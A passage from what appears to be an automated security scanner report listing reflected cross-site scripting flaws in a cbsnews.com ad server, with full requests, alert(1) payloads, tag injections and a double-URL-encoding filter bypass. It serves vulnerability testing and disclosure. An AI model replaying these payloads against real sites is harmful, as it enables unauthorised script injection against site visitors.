Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:49 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DV
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&amp;sg=1815&amp;o=250%253a503544%253a&amp;h=cn&amp;p=2&amp;b=55b1aa3';alert(1)//8fee192004&amp;l=en_US&amp;site=162&amp;pt=8301&amp;nd=503544&amp;pid=&amp;cid=20031629&amp;pp=100&amp;e=&amp;rqid=01phx1-ad-e18:4D5842B347B577&amp;orh=cbsnews.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppart
...[SNIP]...

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload b2ce6*/alert(1)//8b4283b85c0 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:53 GMT
Server: Apache/2.2
Content-Length: 1118
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 18e49<a>b9fc646e6 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:48 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:35:48 GMT
Content-Length: 521

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" -->
...[SNIP]...

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the CID request parameter is copied into a JavaScript inline comment. The payload ebef0*/alert(1)//0a018d77dd was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:06 GMT
Server: Apache/2.2
Content-Length: 1113
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 7f73f*/alert(1)//b4ca9862b97 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:03 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:03 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTAT
...[SNIP]...

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 9d43c<a>fd7ee7a98b4 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:52 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:52 GMT
Content-Length: 553

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1"
...[SNIP]...

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 59f48*/alert(1)//f3203b6ea8b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:45 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wr
...[SNIP]...

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 62ddc*/alert(1)//5c07f31d8c0 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:25 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 8af49*/alert(1)//09dcc35bef3 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:39 GMT
Server: Apache/2.2
Content-Length: 1114
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34 was submitted in the PAGESTATE parameter. This input was echoed as 420d4';alert(1)//5b6eccfcc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:21 GMT
Server: Apache/2.2
Content-Length: 1167
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PT
...[SNIP]...
den%252dUS&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.02.14.01.36.21/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='420d4';alert(1)//5b6eccfcc34';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw5.cnet.com::1348606272 2011.02.14.01.36.21 *//* MAC T 0.0.3.3 */

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload d6a51*/alert(1)//c1e9cd45c17 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2
Content-Length: 1122
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:23 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload c0f65<a>1fc0f8dcd22 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:35 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='100c0f65a1fc0f8dcd22' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 93353*/alert(1)//10a6db2e038 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:52 GMT
Server: Apache/2.2
Content-Length: 1116
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload e911c*/alert(1)//dc43016cd59 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:37:46 GMT
Content-Length: 618

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL
...[SNIP]...

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload dc004<a>c7e5ad6dad5 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

